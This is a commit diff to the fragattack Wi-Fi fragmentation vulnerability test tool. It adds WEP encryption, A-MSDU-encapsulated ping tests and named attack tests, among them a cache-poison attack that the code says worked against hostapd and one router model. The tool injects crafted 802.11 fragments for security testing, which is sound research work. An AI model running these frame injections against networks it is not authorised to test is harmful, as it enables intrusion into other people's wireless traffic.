fragattack: tests against WEP

This commit is contained in:
Mathy 2020-04-22 19:14:35 -04:00 committed by Mathy Vanhoef
parent 8823c2723d
commit 33fd6c30f3
2 changed files with 93 additions and 30 deletions

View File

@ -64,6 +64,20 @@ class TestOptions():
self.ip = None
self.peerip = None
#TODO: Move to libwifi?
def add_msdu_frag(src, dst, payload):
length = len(payload)
p = Ether(dst=dst, src=src, type=length)
payload = raw(payload)
total_length = len(p) + len(payload)
padding = ""
if total_length % 4 != 0:
padding = b"\x00" * (4 - (total_length % 4))
return p / payload / Raw(padding)
# ----------------------------------- Tests -----------------------------------
# XXX --- We should always first see how the DUT reactions to a normal packet.
@ -175,12 +189,13 @@ class Test(metaclass=abc.ABCMeta):
return False
class PingTest(Test):
def __init__(self, ptype, fragments, bcast=False, separate_with=None):
def __init__(self, ptype, fragments, bcast=False, separate_with=None, as_msdu=False):
super().__init__(fragments)
self.ptype = ptype
self.bcast = bcast
self.separate_with = separate_with
self.check_fn = None
self.as_msdu = as_msdu
def check(self, p):
if self.check_fn == None:
@ -193,6 +208,12 @@ class PingTest(Test):
# Generate the header and payload
header, request, self.check_fn = generate_request(station, self.ptype)
if self.as_msdu:
# Set the A-MSDU frame type flag in the QoS header
header.Reserved = 1
# Encapsulate the request in an A-MSDU payload
request = add_msdu_frag(station.mac, station.get_peermac(), request)
# Generate all the individual (fragmented) frames
num_frags = len(self.get_actions(Action.Inject))
frames = create_fragments(header, request, num_frags)
@ -309,19 +330,6 @@ class EapolTest(Test):
self.actions[0].frame = frag1
self.actions[0].frame = frag2
#TODO: Move this function elsewhere?
def add_msdu_frag(src, dst, payload):
length = len(payload)
p = Ether(dst=dst, src=src, type=length)
payload = raw(payload)
total_length = len(p) + len(payload)
padding = ""
if total_length % 4 != 0:
padding = b"\x00" * (4 - (total_length % 4))
return p / payload / Raw(padding)
class EapolMsduTest(Test):
def __init__(self, ptype):
@ -494,7 +502,12 @@ class Station():
if force_key == 0:
log(STATUS, "Encrypting with all-zero key")
key = b"\x00" * len(key)
encrypted = encrypt_ccmp(frame, key, self.pn, keyid)
if len(key) == 16:
encrypted = encrypt_ccmp(frame, key, self.pn, keyid)
else:
encrypted = encrypt_wep(frame, key, self.pn, keyid)
return encrypted
def handle_connecting(self, bss):
@ -515,6 +528,10 @@ class Station():
return self.peermac
def trigger_eapol_events(self, eapol):
# Ignore EAP authentication handshakes
if EAP in eapol: return None
# Track return value of possible trigger Action function
result = None
key_type = eapol.key_info & 0x0008
@ -577,17 +594,15 @@ class Station():
elif act.action == Action.Rekey:
# Force rekey as AP, wait on rekey as client
self.daemon.rekey(self)
if act.wait: break
elif act.action == Action.Roam:
# Roam as client, TODO XXX what was AP?
self.daemon.roam(self)
if act.wait: break
elif act.action == Action.Reconnect:
# Full reconnect as AP, reassociation as client
self.daemon.reconnect(self)
if act.wait: break
elif act.action == Action.Inject:
if act.delay != None:
@ -604,6 +619,9 @@ class Station():
self.daemon.inject_mon(frame)
log(STATUS, "[Injected fragment] " + repr(frame))
# Stop processing actions if requested
if act.wait: break
# With ath9k_htc devices, there's a bug when injecting a frame with the
# More Fragments (MF) field *and* operating the interface in AP mode
# while the target is connected. For some reason, after injecting the
@ -1035,6 +1053,10 @@ class Supplicant(Daemon):
cmd, srcaddr, payload = msg.split()
self.station.handle_eapol_tx(bytes.fromhex(payload))
# This event only occurs with WEP
elif "WPA: EAPOL processing complete" in msg:
self.station.handle_authenticated()
def roam(self, station):
log(STATUS, "Roaming to the current AP.", color="green")
wpaspy_command(self.wpaspy_ctrl, "SET reassoc_same_bss_optim 0")
@ -1080,7 +1102,20 @@ class Supplicant(Daemon):
def cleanup():
daemon.stop()
def prepare_tests(test_name):
def char2action(c):
if c == 'I':
return Action(Action.Connected, action=Action.GetIp)
elif c == 'P':
return Action(Action.Connected, enc=False)
elif c == 'E':
return Action(Action.Connected, enc=True)
raise Exception("Unrecognized action")
def prepare_tests(test_name, actions):
if actions != None:
actions = [char2action(c) for c in actions]
if test_name == "qca_test":
test = QcaDriverTest()
@ -1091,10 +1126,19 @@ def prepare_tests(test_name):
test = QcaDriverRekey()
elif test_name == "ping":
# Simple ping as sanity check
if actions == None:
actions = [Action(Action.Connected, action=Action.GetIp),
Action(Action.Connected, enc=True)]
test = PingTest(REQ_ICMP, actions)
elif test_name == "ping_msdu":
# Simple ping as sanity check
test = PingTest(REQ_ICMP,
[Action(Action.Connected, action=Action.GetIp),
Action(Action.Connected, enc=True)])
Action(Action.Connected, enc=True)],
as_msdu=True)
elif test_name == "ping_frag":
# Simple ping as sanity check
@ -1104,6 +1148,22 @@ def prepare_tests(test_name):
Action(Action.Connected, enc=True),
])
elif test_name == "ping_frag_skip":
test = PingTest(REQ_ICMP,
[Action(Action.Connected, action=Action.GetIp),
Action(Action.Connected, enc=True),
Action(Action.Connected, enc=True, inc_pn=2),
])
elif test_name == "wep_mixed_key":
log(WARNING, "Cannot predict WEP key reotation. Fragment may time out, use very short key rotation!", color="orange")
test = PingTest(REQ_ICMP,
[Action(Action.Connected, action=Action.GetIp),
Action(Action.Connected, enc=True),
# On a WEP key rotation we get a Connected event. So wait for that.
Action(Action.AfterAuth, enc=True),
])
elif test_name == "ping_frag_sep":
# Check if we can send frames in between fragments
separator = Dot11(type="Data", subtype=8, SC=(33 << 4) | 0)/Dot11QoS()/LLC()/SNAP()
@ -1114,19 +1174,21 @@ def prepare_tests(test_name):
separate_with=separator
)
elif test_name == "1":
# Check if the STA receives broadcast (useful test against AP)
test = PingTest(REQ_DHCP,
[Action(Action.Connected, enc=True)],
bcast=True)
elif test_name == "2":
elif test_name == "cache_poison":
# Cache poison attack. Worked against Linux Hostapd and RT-AC51U.
test = PingTest(REQ_ICMP,
[Action(Action.Connected, enc=True),
Action(Action.Connected, action=Action.Reconnect),
Action(Action.AfterAuth, enc=True)])
# -----------------------------------------------------------------------------------------
elif test_name == "1":
# Check if the STA receives broadcast (useful test against AP)
test = PingTest(REQ_DHCP,
[Action(Action.Connected, enc=True)],
bcast=True)
elif test_name == "3":
# Two fragments over different PTK keys. Against RT-AC51U AP we can
# trigger a rekey, but must do the rekey handshake in plaintext.
@ -1146,7 +1208,7 @@ def prepare_tests(test_name):
elif test_name == "5":
test = MacOsTest(REQ_DHCP)
elif test_name == "7":
elif test_name == "eapol_msdu":
test = EapolMsduTest(REQ_ICMP)
# XXX TODO : Hardware decrypts it using old key, software using new key?
@ -1183,6 +1245,7 @@ if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Test for fragmentation vulnerabilities.")
parser.add_argument('iface', help="Interface to use for the tests.")
parser.add_argument('testname', help="Name or identifier of the test to run.")
parser.add_argument('actions', nargs='?', help="Optional textual descriptions of actions")
parser.add_argument('--ip', help="IP we as a sender should use.")
parser.add_argument('--peerip', help="IP of the device we will test.")
parser.add_argument('--ap', default=False, action='store_true', help="Act as an AP to test clients.")
@ -1192,7 +1255,7 @@ if __name__ == "__main__":
# Convert parsed options to TestOptions object
options = TestOptions()
options.interface = args.iface
options.test = prepare_tests(args.testname)
options.test = prepare_tests(args.testname, args.actions)
options.ip = args.ip
options.peerip = args.peerip

@ -1 +1 @@
Subproject commit 309c85a0d19e0ea039e4557417f99c6615d2f6d1
Subproject commit 924e39b8a3be547c745e785a3f4de3bc2c483763